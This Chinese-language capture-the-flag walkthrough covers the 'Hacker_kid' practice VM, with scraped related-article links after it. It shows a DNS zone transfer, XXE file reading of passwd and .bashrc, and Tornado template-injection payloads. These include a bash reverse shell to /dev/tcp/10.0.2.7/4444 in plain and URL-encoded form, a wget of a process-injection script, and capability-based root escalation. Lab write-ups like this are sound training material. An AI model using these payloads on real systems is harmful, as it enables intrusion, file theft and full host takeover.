1.常规端口服务及侦探

2.发现9999存在python轻量级web开发框架tornado

3.怀疑udp53端口作为同一个域之间传输数据的方式，扫描发现存在udp53端口
sudo nmap -p53 -sU 10.0.2.15

1. 查看网页源码，发现注释中存在page_no参数处存在get提交方法，参数爆破发现21存在回显
   ，发现是不同域名绑定一个ip这种dns解析服务
   cve-2020-8625 cve-2021-25216 两个针对dns服务的漏洞无利用代码失败

5.在hosts更改绑定后发现主机记录没有改变，使用dns区域访问，axfr区域传输后会返回域名下的
所有记录，dig axfr @10.0.2.28 blackhat.local发现存在axfr漏洞，发现存在新域名,均绑定到hosts
里面

6.挨个访问新域名，发现hackerkid.blackhat.loacl有新内容,同时发现所有域名9999端口都存在一个
登录界面，在新界面上发现提交方式为xml，考虑是否存在xxe漏

]> 将邮箱处修改为&xxe；

发现存在漏洞并且成功读取到passwd文件,发现saket账号存疑

7.挨个读取后，在读取/home/saket/.bashrc时没有回显，使用php封装器读取，然后进行解码
，发现得到用户名和密码，在登录处登录失效，尝试使用saket作为用户名登录

8.登录进去思考发现name可能是变量，发现回显名字，思考是否存在模板注入，使用通杀模板注入payload
{{1+abcxyz}}${1+1bcxyz}%3C%1+abcxyz%%3E[acbxyz]
${77},{{77}},发现可以执行，对模板进行注入反弹操作
{% import os %}{{os.system(‘bash -c “bash -i >& /dev/tcp/10.0.2.7/4444 0>&1”’)}}
发现连接失败，对编码进行混淆绕过
%7B%25%20import%20os%20%25%7D%7B%7Bos.system%28%27bash%20-c%20%22bash%20-i%20%3E%26%20%2Fdev%2
Ftcp%2F10.0.2.15%2F4444%2000%3E%261%22%27%29%7D%7D
成功得到反弹shell
9.开始进行提权
基础提权方式都失败
capabilities是一个权限管理功能，设置权限赋予
setcap cap_net_raw,cap_net_admin=eip /usr/bin/dumpcap
首先进行查询指令 /sbin/getcap getcap -r / 2>/dev/null
发现一个python2.7的程序拥有capabilities权限
ps -U root 查看所有以root账号运行的进程 或者 ps -aef | grep root
下载利用权限利用的python进程注入脚本wget https://gist.githubusercontent.com/wifisecguy/1d69839fe55c36a1dbecca66948ad56/raw/e919439010bbabed769d86303ff18ffbacdaecfd/inject.py
python2.7 inject.py 862 默认侦听端口为5600

10.kali本机侦听端口发现注入成功，得到root权限，打靶成功

Hacker_kid靶机打靶过程及思路相关推荐

1. Tre靶机打靶过程及思路

   1.常规端口及服务发现 2.访问到401认证界面,弱口令修改之后登录成功,利用mantis最新版本rce突破外围打点成功 3.访问到敏感目录下sysytem下的数据库账号配置文件,利用该账号进入数据库 ...

2. Vikings靶机打靶过程及思路

   1.常规端口服务侦探 2.用gubuster进行路径爆破,发现war下war-is-over新目录 gobuster dir -r -u http://10.0.2.16/ -x txt,html,p ...

3. Vegeta靶机打靶过程及思路

   1.常规端口扫描及发现 2.发现只有80端口可以突破,于是进行大字典的扫描,得到某个目录下存在一张图片 3.使用zbarimg工具进行读取但是没有得到任何有效信息,解码得到的文字并不是登录密码 4.再 ...

4. 渗透测试-靶机打靶思路与方法

   渗透测试-靶机打靶思路与方法 文章目录 渗透测试-靶机打靶思路与方法 一．对靶机进行信息收集 1.首先对目标存活靶机发起嗅探: 2.对目标主机开放端口及服务发起探测 3.对非web端口的服务发起迅速的 ...

5. 实弹打靶过程中有哪些注意事项

   在室内射击场中,实弹打靶和模拟影像打靶可以有效结合,是目前智能化靶场必备的训练配套设施.在室内射击场建设中,需要预留出模拟影像打靶设备的安装位置,并且实弹打靶和模拟影像射击训练不可同时进行. 在进行实 ...

6. 【深度学习】模型训练过程可视化思路（可视化工具TensorBoard）

   [深度学习]模型训练过程可视化思路(可视化工具TensorBoard) 文章目录 1 TensorBoard的工作原理 2 TensorFlow中生成log文件 3 启动TensorBoard,读取l ...

7. php %3c php 攻击,web 攻击靶机解题过程

   sql注入靶机攻击过程请参考 https://pentesterlab.com/exercises/from_sqli_to_shell/course http://www.sohu.com/a/12 ...

8. web 攻击靶机解题过程

   sql注入靶机攻击过程请参考 https://pentesterlab.com/exercises/from_sqli_to_shell/course http://www.sohu.com/a/12 ...

9. Js黑客帝国效果 文字下落 制作过程和思路

   效果预览: http://jsfiddle.net/dtdxrk/m8R6b/embedded/result/ Js黑客帝国效果 文字向下落制作过程和思路 1.css控制文字竖显示 2.动态添加div ...

最新文章

1. flutter打包的app有多大_Flutter-最近搞了个项目(常用控件，第三方基本库)-底部导航，登录，启动画面，webview等...
2. R语言使用lm构建线性回归模型、并将目标变量对数化实战：可视化模型预测输出与实际值对比图、可视化模型的残差、模型系数（coefficient）、模型总结信息（summary）、残差总结信息
3. BTrace生产调试
4. 正则化方法之DropBlock
5. 07 | 案例篇：系统中出现大量不可中断进程和僵尸进程怎么办？（上）
6. php最后最后再执行,php最后几个函数
7. sed 和read line用法
8. 浅谈JSP表单中的form传值
9. e3是合法浮点数吗_下列哪些是不合法的浮点数的选项是 123 2e4.2 .e5 -e3 .234 1e3
10. android 系统（85）---MAT 工具使用
11. Cere Network 将于 Republic、DAO Maker 和 Polkastarter 上进行公售
12. android手机安装windows系统,安卓手机原来还可以这样安装windows系统，你还不知道吗？...
13. abc物动量分析计算机视频,物动量ABC分类法
14. 编写吃c语言程序步骤,自己做的一个C语言小游戏——吃金子
15. 食物语服务器什么时候维护,食物语更新公告
16. Unity最新版打包AssetBundle和加载的方法
17. R语言进行中文分词和聚类
18. java 笔记本i7 i5_笔记本i7低压cpu性能抵不过i5标压cpu,为什么还叫i7
19. php关键词回复源码,PHP对接公众号搜索自动回复源码
20. 如何评估ASO优化方案案例推广效果，优化aso方案

热门文章

1. python破解md5_python怎么使用md5加密解密
2. java 1.13 快照下载_Minecraft Java快照版18w15a下载
3. Oracle中有dateadd吗,oracle dateadd的函数有哪些？
4. 我们应该怎样面对自己
5. 4种超好用的PS调色小技巧，知道的人不多！
6. python音乐相册_python爬虫之爬取网易云音乐的歌曲图片和歌词
7. 我有一个计算机梦想作文500,我有一个梦想作文500字
8. 解决Manifest merger failed with multiple errors方法
9. hp 打印机更改 wifi direct 的密码
10. 用python写一个有AI的斗地主游戏（二）——简述后端代码和思路